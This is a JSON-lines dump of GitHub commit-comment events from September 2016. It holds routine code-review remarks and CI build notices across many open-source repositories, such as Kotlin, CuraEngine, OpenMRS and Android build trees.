{"id":"4567585090","type":"CommitCommentEvent","actor":{"login":"ferhung-mtk"},"repo":{"name":"xen0n/android_device_meizu_arale"},"payload":{"comment":{"id":19034731,"position":null,"line":null,"path":null,"commit_id":"6b29c0ddd1ce3efa841365c22d9d63a993180be6","created_at":"2016-09-15T11:44:16Z","updated_at":"2016-09-15T11:44:16Z","body":"Maybe you just need to use: exec _ZN11HWCMediator7prepareEjPP22hwc_display_contents_1+620"}},"created_at":"2016-09-15T11:44:16Z"}
{"id":"4567586411","type":"CommitCommentEvent","actor":{"login":"afxefx"},"repo":{"name":"afxefx/InstallerOpt"},"payload":{"comment":{"id":19034737,"position":42,"line":758,"path":"main/java/net/fypm/InstallerOpt/Main.java","commit_id":"17685a3c265b577be324502f658a970bcad2859d","created_at":"2016-09-15T11:44:35Z","updated_at":"2016-09-15T11:44:35Z","body":"Good catch, though I had wrapped it in enableDebug already but I must have missed it"}},"created_at":"2016-09-15T11:44:35Z"}
{"id":"4567588553","type":"CommitCommentEvent","actor":{"login":"dougsyer"},"repo":{"name":"zenoss/zenpacklib"},"payload":{"comment":{"id":19034740,"position":null,"line":null,"path":null,"commit_id":"379c3f737e2129f1bb0a4ba12238f0732c007c11","created_at":"2016-09-15T11:45:06Z","updated_at":"2016-09-15T11:45:06Z","body":"Nice"}},"created_at":"2016-09-15T11:45:06Z"}
{"id":"4567590710","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19034745,"position":null,"line":null,"path":null,"commit_id":"cc3a8b396324209d60f78eddc6c07c74065a9665","created_at":"2016-09-15T11:45:37Z","updated_at":"2016-09-15T11:45:37Z","body":"Each html tags add prop like aria-label='some-recognized-aria' \r\n\r\nExample:\r\n\r\n<div aria-label='bookmark'>link </div>"}},"created_at":"2016-09-15T11:45:37Z"}
{"id":"4567591301","type":"CommitCommentEvent","actor":{"login":"gyurisc"},"repo":{"name":"xamarin/WebSharp"},"payload":{"comment":{"id":19034747,"position":null,"line":null,"path":null,"commit_id":"669fdb7c1563e9904e4cc73ae2938b8713486741","created_at":"2016-09-15T11:45:45Z","updated_at":"2016-09-15T11:45:45Z","body":"The Init method is not virtual anymore therefore cannot be overriden and that broke the GettingStarted solution that relies on this. "}},"created_at":"2016-09-15T11:45:45Z"}
{"id":"4567592878","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19034751,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T11:46:09Z","updated_at":"2016-09-15T11:46:09Z","body":"I mean Travis CI on my fork: https://saucelabs.com/beta/builds/a6e22beb060c442081df07b3cd666738"}},"created_at":"2016-09-15T11:46:09Z"}
{"id":"4567594560","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"PureNexusProject/android_build"},"payload":{"comment":{"id":19034756,"position":null,"line":null,"path":null,"commit_id":"01bf440ae9cbf253d3a35137bb561457edc66d08","created_at":"2016-09-15T11:46:33Z","updated_at":"2016-09-15T11:46:33Z","body":"Good :D With user builds, even with the adb fingerprint popup fix, i was noticing another little issue: it doesn't let you do \"adb remount\" even if you run \"adb root\", but root works if you go into adb shell.\r\nWith userdebug, this is fixed too. \r\n"}},"created_at":"2016-09-15T11:46:33Z"}
{"id":"4567595598","type":"CommitCommentEvent","actor":{"login":"tiennou"},"repo":{"name":"ssp/gitx"},"payload":{"comment":{"id":19034764,"position":9,"line":66,"path":"Classes/git/PBGitIndex.h","commit_id":"ae7370c2fa4877e23c90297f6f0e2e67453dc0ab","created_at":"2016-09-15T11:46:50Z","updated_at":"2016-09-15T11:46:50Z","body":"Question: I'm not thrilled by this change at all, because it breaks the layering (it makes a model-level object aware of a controller-level object). I can see the reason of this change though, but I'm wondering if there would be a better way ?\r\n\r\nAlso, I'm doing some GitX work atm because I think I upgraded to git 2.10 recently, and the commit view was doing weird things (like staging a bunch of random files just after a commit is made). Does that ring a bell to you ?"}},"created_at":"2016-09-15T11:46:50Z"}
{"id":"4567597202","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19034768,"position":null,"line":null,"path":null,"commit_id":"08887ef36c59caa0ae62a939cdd8207d19abb4e6","created_at":"2016-09-15T11:47:14Z","updated_at":"2016-09-15T11:47:14Z","body":"We will in the future. "}},"created_at":"2016-09-15T11:47:14Z"}
{"id":"4567598110","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19034771,"position":null,"line":null,"path":null,"commit_id":"d448ab51c328b7b1674d1ca27786238fcc02fb3f","created_at":"2016-09-15T11:47:26Z","updated_at":"2016-09-15T11:47:26Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Cw9m-6i3R9SQvwhv_4jRQQ"}},"created_at":"2016-09-15T11:47:26Z"}
{"id":"4567598716","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034773,"position":14,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-15T11:47:35Z","updated_at":"2016-09-15T11:47:35Z","body":"There won't be support for the same reason as there won't be brim: it doesn't fit.\r\n\r\nNote totally sure though. Will put it in the JIRA issue."}},"created_at":"2016-09-15T11:47:35Z"}
{"id":"4567600978","type":"CommitCommentEvent","actor":{"login":"ctarabusi"},"repo":{"name":"Kotlin/kotlin-koans"},"payload":{"comment":{"id":19034780,"position":null,"line":null,"path":null,"commit_id":"6ff2baac5e1a8246c3e8f29130c89297468a2a62","created_at":"2016-09-15T11:48:05Z","updated_at":"2016-09-15T11:48:05Z","body":"I also notice this, why the fix is still not deployed?"}},"created_at":"2016-09-15T11:48:05Z"}
{"id":"4567601996","type":"CommitCommentEvent","actor":{"login":"IGordynskyi"},"repo":{"name":"IGordynskyi/SAI"},"payload":{"comment":{"id":19034782,"position":null,"line":null,"path":null,"commit_id":"d0c0fb54b7da781a2f3bd075c758e8e39e8b928a","created_at":"2016-09-15T11:48:18Z","updated_at":"2016-09-15T11:48:18Z","body":"HW does not allow to rewrite other than LSB of MAC address, but test case tries to rewrite second byte."}},"created_at":"2016-09-15T11:48:18Z"}
{"id":"4567603824","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19034784,"position":null,"line":null,"path":null,"commit_id":"a4a2915d08ec05851255e5bf74e496899d105989","created_at":"2016-09-15T11:48:41Z","updated_at":"2016-09-15T11:48:41Z","body":"TeamCity Todo :: Build [Build 100](http://109.103.226.38:8512/viewLog.html?buildId=38495&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T11:48:41Z"}
{"id":"4567603876","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19034785,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T11:48:42Z","updated_at":"2016-09-15T11:48:42Z","body":"@Sami32 IDE tools like Eclipse check for those things and will issue a warning for unused imports. If they're both there they are probably both used.u"}},"created_at":"2016-09-15T11:48:42Z"}
{"id":"4567604600","type":"CommitCommentEvent","actor":{"login":"shachimi"},"repo":{"name":"shachimi/room25"},"payload":{"comment":{"id":19034789,"position":27,"line":27,"path":"src/game/game-client.cc","commit_id":"05feab9e2628a345b7388951c685e7e3bd69f4f6","created_at":"2016-09-15T11:48:52Z","updated_at":"2016-09-15T11:48:52Z","body":"In fact it is not truly necessary to reimplement it because when calling the functions of the player it will then listen to the socket and wait to recv/send message. Maybe we should work as adapt the main_loop to have a more suitable handling."}},"created_at":"2016-09-15T11:48:52Z"}
{"id":"4567604833","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034791,"position":null,"line":null,"path":null,"commit_id":"2d99af1aa475eb98443558bc9b27a505b7835345","created_at":"2016-09-15T11:48:55Z","updated_at":"2016-09-15T11:48:55Z","body":"TeamCity test :: test [Build 15](http://ci.lemmew.com:8111/viewLog.html?buildId=1467&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T11:48:55Z"}
{"id":"4567605017","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19034793,"position":null,"line":null,"path":null,"commit_id":"a4a2915d08ec05851255e5bf74e496899d105989","created_at":"2016-09-15T11:48:58Z","updated_at":"2016-09-15T11:48:58Z","body":"TeamCity Todo :: Build [Build 100](http://109.103.226.38:8512/viewLog.html?buildId=38495&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 13 Build time: 00:00:08"}},"created_at":"2016-09-15T11:48:58Z"}
{"id":"4567605044","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034794,"position":null,"line":null,"path":null,"commit_id":"2d99af1aa475eb98443558bc9b27a505b7835345","created_at":"2016-09-15T11:48:58Z","updated_at":"2016-09-15T11:48:58Z","body":"TeamCity test :: test [Build 15](http://ci.lemmew.com:8111/viewLog.html?buildId=1467&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-15T11:48:58Z"}
{"id":"4567613664","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19034810,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T11:51:02Z","updated_at":"2016-09-15T11:51:02Z","body":"It started to work on openmrs as well: https://saucelabs.com/tests/c87203db207d4ed9873cc0f344f85ca5"}},"created_at":"2016-09-15T11:51:02Z"}
{"id":"4567614309","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034813,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T11:51:12Z","updated_at":"2016-09-15T11:51:12Z","body":"Старые муторно ворочать, потому что http://shestak.org/forum/showpost.php?p=13035"}},"created_at":"2016-09-15T11:51:12Z"}
{"id":"4567615980","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034821,"position":null,"line":null,"path":null,"commit_id":"b5fe78be0f67d2da9d57e48c06e98f5ec221450a","created_at":"2016-09-15T11:51:35Z","updated_at":"2016-09-15T11:51:35Z","body":"TeamCity test :: test [Build 16](http://ci.lemmew.com:8111/viewLog.html?buildId=1468&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T11:51:35Z"}
{"id":"4567616192","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034823,"position":null,"line":null,"path":null,"commit_id":"b5fe78be0f67d2da9d57e48c06e98f5ec221450a","created_at":"2016-09-15T11:51:39Z","updated_at":"2016-09-15T11:51:39Z","body":"TeamCity test :: test [Build 16](http://ci.lemmew.com:8111/viewLog.html?buildId=1468&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-15T11:51:39Z"}
{"id":"4567616698","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19034824,"position":9,"line":171,"path":"UM/Settings/SettingInstance.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-15T11:51:46Z","updated_at":"2016-09-15T11:51:46Z","body":"For reference: https://github.com/Ultimaker/uranium/commit/a7b270c9"}},"created_at":"2016-09-15T11:51:46Z"}
{"id":"4567620487","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034834,"position":14,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-15T11:52:41Z","updated_at":"2016-09-15T11:52:41Z","body":"It probably can't hurt too much though.."}},"created_at":"2016-09-15T11:52:41Z"}
{"id":"4567622942","type":"CommitCommentEvent","actor":{"login":"joshrabinowitz"},"repo":{"name":"bigpresh/Dancer-Plugin-SimpleCRUD"},"payload":{"comment":{"id":19034838,"position":null,"line":null,"path":null,"commit_id":"de512dee1ff3462e9dd19508a994b68a1063c701","created_at":"2016-09-15T11:53:17Z","updated_at":"2016-09-15T11:53:17Z","body":"nice, thanks bigpresh"}},"created_at":"2016-09-15T11:53:17Z"}
{"id":"4567624953","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034840,"position":259,"line":259,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ExtractSuperclassRefactoring.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:53:45Z","updated_at":"2016-09-15T11:53:45Z","body":"Do we actually need a `runReadAction` here, given that this method runs in the EDT?"}},"created_at":"2016-09-15T11:53:45Z"}
{"id":"4567625323","type":"CommitCommentEvent","actor":{"login":"friederbluemle"},"repo":{"name":"clementine-player/Clementine"},"payload":{"comment":{"id":19034841,"position":null,"line":null,"path":null,"commit_id":"170c64cd8bef9df2ea88dd4f72eec641c250bcfd","created_at":"2016-09-15T11:53:52Z","updated_at":"2016-09-15T11:53:52Z","body":"I just ran into an error compiling Clementine on Arch Linux, caused by `PROTOBUF_STATIC_LIBRARY` not being set. Simply reverting this commit fixed it, and gave me a fully working executable (as far as I can tell). What is the downside of not linking statically to libprotobuf?"}},"created_at":"2016-09-15T11:53:52Z"}
{"id":"4567625864","type":"CommitCommentEvent","actor":{"login":"shachimi"},"repo":{"name":"shachimi/room25"},"payload":{"comment":{"id":19034842,"position":93,"line":448,"path":"src/board/board.cc","commit_id":"262c7f57c81f937fb1f7370969931cda8b05b50c","created_at":"2016-09-15T11:53:59Z","updated_at":"2016-09-15T11:53:59Z","body":"not sure to understand why you need this, can't you get a cell by its pos (which could be consider as its id btw)"}},"created_at":"2016-09-15T11:53:59Z"}
{"id":"4567627678","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19034851,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T11:54:26Z","updated_at":"2016-09-15T11:54:26Z","body":"@mcostalba Running a normal bench I measure that there are snipers in 20% of cases.\r\nIn case of snipers !=0 the mean-value is 1.03 so I suggest to move the _defensive_  assignment into the loop of snipers. \r\n\r\n"}},"created_at":"2016-09-15T11:54:26Z"}
{"id":"4567627911","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034852,"position":278,"line":278,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ExtractSuperclassRefactoring.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:54:29Z","updated_at":"2016-09-15T11:54:29Z","body":"Would be nice to undo the incomplete changes if we run into this situation."}},"created_at":"2016-09-15T11:54:29Z"}
{"id":"4567629562","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19034856,"position":null,"line":null,"path":null,"commit_id":"cd2028daac5afcddb220f3b6a7bfe6caa4abdf7b","created_at":"2016-09-15T11:54:54Z","updated_at":"2016-09-15T11:54:54Z","body":"@valegagge uhm one of these files is for iCubGenova05?"}},"created_at":"2016-09-15T11:54:54Z"}
{"id":"4567630297","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034859,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T11:55:05Z","updated_at":"2016-09-15T11:55:05Z","body":"LoL. Yes :+1: "}},"created_at":"2016-09-15T11:55:05Z"}
{"id":"4567635384","type":"CommitCommentEvent","actor":{"login":"sihonglow"},"repo":{"name":"sihonglow/testing1"},"payload":{"comment":{"id":19034876,"position":null,"line":null,"path":null,"commit_id":"f587c11cd2317544006fae1c20508eec2d9e0b8c","created_at":"2016-09-15T11:56:18Z","updated_at":"2016-09-15T11:56:18Z","body":"meow"}},"created_at":"2016-09-15T11:56:18Z"}
{"id":"4567635619","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034877,"position":14,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-15T11:56:21Z","updated_at":"2016-09-15T11:56:21Z","body":"BTW: its more like:\r\n```\r\n─────v─────────v─────\r\n─────v─────────v─────\r\n────┐ ┌───────┐ ┌────\r\n──┐ │ │ ┌───┐ │ │ ┌──\r\n█ │ │ │ │ ░ │ │ │ │ █\r\n──┘ │ │ └───┘ │ │ └──\r\n────┘ └───────┘ └────\r\n─────^─────────^─────\r\n─────^─────────^─────\r\n```"}},"created_at":"2016-09-15T11:56:21Z"}
{"id":"4567641185","type":"CommitCommentEvent","actor":{"login":"martin-g"},"repo":{"name":"Kotlin/kotlinx.html"},"payload":{"comment":{"id":19034891,"position":16,"line":16,"path":"js/src/test/kotlin/exceptions.kt","commit_id":"00f59df68aef1e0008cf5da75763b91cf7078073","created_at":"2016-09-15T11:57:44Z","updated_at":"2016-09-15T11:57:44Z","body":"Not related to this PR but: Why `div` is in `kotlinx.html.js` package and not in `kotlinx.html.div` ?"}},"created_at":"2016-09-15T11:57:44Z"}
{"id":"4567644479","type":"CommitCommentEvent","actor":{"login":"shachimi"},"repo":{"name":"shachimi/room25"},"payload":{"comment":{"id":19034897,"position":12,"line":185,"path":"src/board/room-factory.cc","commit_id":"262c7f57c81f937fb1f7370969931cda8b05b50c","created_at":"2016-09-15T11:58:31Z","updated_at":"2016-09-15T11:58:31Z","body":"first: no need to break after a return\r\nsecond: even if your inside a static method of a factory do the RoomFactory::getXxxRoom(), it makes the read easier."}},"created_at":"2016-09-15T11:58:31Z"}
{"id":"4567644842","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034898,"position":null,"line":null,"path":null,"commit_id":"9e6e0a1f9ae5978f7307d4e1c3f5d7c17f885ce0","created_at":"2016-09-15T11:58:36Z","updated_at":"2016-09-15T11:58:36Z","body":"TeamCity test :: test [Build 17](http://ci.lemmew.com:8111/viewLog.html?buildId=1469&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T11:58:36Z"}
{"id":"4567645004","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034900,"position":null,"line":null,"path":null,"commit_id":"9e6e0a1f9ae5978f7307d4e1c3f5d7c17f885ce0","created_at":"2016-09-15T11:58:40Z","updated_at":"2016-09-15T11:58:40Z","body":"TeamCity test :: test [Build 17](http://ci.lemmew.com:8111/viewLog.html?buildId=1469&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-15T11:58:40Z"}
{"id":"4567649362","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034907,"position":110,"line":110,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ui/KotlinExtractSuperclassDialog.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:59:43Z","updated_at":"2016-09-15T11:59:43Z","body":"Is this needed? Can't we accept any name and quote it?"}},"created_at":"2016-09-15T11:59:43Z"}
{"id":"4567649419","type":"CommitCommentEvent","actor":{"login":"aploium"},"repo":{"name":"aploium/zmirror"},"payload":{"comment":{"id":19034909,"position":null,"line":null,"path":null,"commit_id":"cc9691662a72afcdb8de1b68df8f20e54c4a3017","created_at":"2016-09-15T11:59:44Z","updated_at":"2016-09-15T11:59:44Z","body":"@zxq2233 youtube-php-mirroring\r\n@greatfire website-mirror-by-proxy\r\n@restran web-proxy\r\n@isayme isayme/google\r\n@zjuyxy google200"}},"created_at":"2016-09-15T11:59:44Z"}
{"id":"4567650766","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19034912,"position":36,"line":262,"path":"jps-plugin/src/org/intellij/plugins/ceylon/jps/CeylonBuilder.java","commit_id":"16e5f0355fde128950d676348325ff30355074b1","created_at":"2016-09-15T12:00:03Z","updated_at":"2016-09-15T12:00:03Z","body":"In this case wouldn't it also make sense to add `lookup=../dependent-project/modules` to the config, so that the CLI is also aware of that dependency?"}},"created_at":"2016-09-15T12:00:03Z"}
{"id":"4567651363","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19034914,"position":null,"line":null,"path":null,"commit_id":"557439aa2884c88b3fa24bed1cb49976250c3751","created_at":"2016-09-15T12:00:13Z","updated_at":"2016-09-15T12:00:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 56](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13329&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-15T12:00:13Z"}
{"id":"4567656286","type":"CommitCommentEvent","actor":{"login":"aploium"},"repo":{"name":"aploium/zmirror"},"payload":{"comment":{"id":19034921,"position":null,"line":null,"path":null,"commit_id":"f882d1481c72fdadaebee5d830d584dfc8a4b3f9","created_at":"2016-09-15T12:01:16Z","updated_at":"2016-09-15T12:01:16Z","body":"@cuber ngx_http_google_filter_module"}},"created_at":"2016-09-15T12:01:16Z"}
{"id":"4567656687","type":"CommitCommentEvent","actor":{"login":"alexandre433"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":19034922,"position":null,"line":null,"path":null,"commit_id":"73c0b5c1904443ed16ad64706feba59708459a0f","created_at":"2016-09-15T12:01:21Z","updated_at":"2016-09-15T12:01:21Z","body":"Does your WoW Packet Parser have less \"bugs\" than the normal one?"}},"created_at":"2016-09-15T12:01:21Z"}
{"id":"4567656673","type":"CommitCommentEvent","actor":{"login":"IGordynskyi"},"repo":{"name":"IGordynskyi/SAI"},"payload":{"comment":{"id":19034923,"position":null,"line":null,"path":null,"commit_id":"76f31d6f6c1647abb16ea9eed9854128269a10be","created_at":"2016-09-15T12:01:22Z","updated_at":"2016-09-15T12:01:22Z","body":"Deleted space in line 1218:\r\nline 1218\r\n    @group('l3')\r\n               ^\r\nIndentationError: unindent does not match any outer indentation level"}},"created_at":"2016-09-15T12:01:22Z"}
{"id":"4567656781","type":"CommitCommentEvent","actor":{"login":"kotarou3"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19034924,"position":null,"line":null,"path":null,"commit_id":"77b59e78582cb7eaa59655cb3ff9471417b757d5","created_at":"2016-09-15T12:01:22Z","updated_at":"2016-09-15T12:01:22Z","body":"It's probably worth noting that data centers generally don't own any significant IP range. It's the ASs (Autonomous Systems) that own IP range."}},"created_at":"2016-09-15T12:01:22Z"}
{"id":"4567657650","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19034925,"position":null,"line":null,"path":null,"commit_id":"557439aa2884c88b3fa24bed1cb49976250c3751","created_at":"2016-09-15T12:01:35Z","updated_at":"2016-09-15T12:01:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 56](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13329&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:22"}},"created_at":"2016-09-15T12:01:35Z"}
{"id":"4567658893","type":"CommitCommentEvent","actor":{"login":"Warrior-"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034933,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T12:01:52Z","updated_at":"2016-09-15T12:01:52Z","body":"мне лично больше импонирует вариант номер один)"}},"created_at":"2016-09-15T12:01:52Z"}
{"id":"4567660102","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034936,"position":16,"line":86,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/memberInfo/KotlinMemberInfo.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T12:02:10Z","updated_at":"2016-09-15T12:02:10Z","body":"You can simplify this using `apply`"}},"created_at":"2016-09-15T12:02:10Z"}
{"id":"4567661092","type":"CommitCommentEvent","actor":{"login":"takechi"},"repo":{"name":"takechi/Avestan"},"payload":{"comment":{"id":19034940,"position":null,"line":null,"path":null,"commit_id":"1387eeff83bf7aa6fac348594887cbbdf21d4c81","created_at":"2016-09-15T12:02:22Z","updated_at":"2016-09-15T12:02:22Z","body":"（おそらく Win10 Anniversary Update のせいで、）ディレクトリ移動時にフォーカスが解除されるようになり、\r\nキーボードでの操作が鬱陶しいことになっていたので修正。\r\n\r\n空のディレクトリに移動した場合には対応できていない。\r\n（例えば、空ディレクトリに移動した直後に Ctrl-v を押しても反応しない）"}},"created_at":"2016-09-15T12:02:22Z"}
{"id":"4567663355","type":"CommitCommentEvent","actor":{"login":"lfuelling"},"repo":{"name":"RobbidyRob/BFI18_ChatApp"},"payload":{"comment":{"id":19034948,"position":13,"line":13,"path":"app/src/test/java/com/example/robbidyrob/chatapp/ExampleUnitTest - Kopie.java","commit_id":"b3a856269d801aa4d4a2b98f7119c17a9b126ebb","created_at":"2016-09-15T12:02:51Z","updated_at":"2016-09-15T12:02:51Z","body":"`assertFalse(!true);` wäre in etwa genauso effektiv. 🤔"}},"created_at":"2016-09-15T12:02:51Z"}
{"id":"4567664400","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19034950,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T12:03:06Z","updated_at":"2016-09-15T12:03:06Z","body":"I see, I guess we want to have server logs anyway? If so, I've opened PR https://github.com/openmrs/openmrs-distro-referenceapplication/pull/200. There is one minor problem - it is hard coded on referenceapplication container, it should be more general, I can update it right now or open PR with followup later."}},"created_at":"2016-09-15T12:03:06Z"}
{"id":"4567668396","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19034963,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T12:04:03Z","updated_at":"2016-09-15T12:04:03Z","body":"racket-doc already depends on lots of other packages, including Typed\nRacket, so this seems like it wouldn't change much.\n\nOn Thu, Sep 15, 2016, 7:13 AM Jay McCarthy <notifications@github.com> wrote:\n\n> It would make racket-doc require web-server-doc which would force that\n> package to go to a weird place in the dependency tree\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/racket/racket/commit/38622ce2767a36920c34b4b196d49fbbcca1b41d#commitcomment-19034335>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAO78zeZPEJyngTHg9MAPGhrLvb0A7Lcks5qqSg5gaJpZM4J9Yse>\n> .\n>\n"}},"created_at":"2016-09-15T12:04:03Z"}
{"id":"4567669942","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19034968,"position":null,"line":null,"path":null,"commit_id":"02c63dc9a2606e94259a9596a3f386b23c7e9153","created_at":"2016-09-15T12:04:26Z","updated_at":"2016-09-15T12:04:26Z","body":"Is there a reason why this hasn't made it into the 4.1.0 release? Seems to have been committed earlier than when the 4.1.0 tag was created."}},"created_at":"2016-09-15T12:04:26Z"}
{"id":"4567671342","type":"CommitCommentEvent","actor":{"login":"Shestak"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034974,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T12:04:47Z","updated_at":"2016-09-15T12:04:47Z","body":"Тогда остаются 1 и 2 вариант. Я вообще за чистку-актуализацию, но т.к. не играю, потому хз :)"}},"created_at":"2016-09-15T12:04:47Z"}
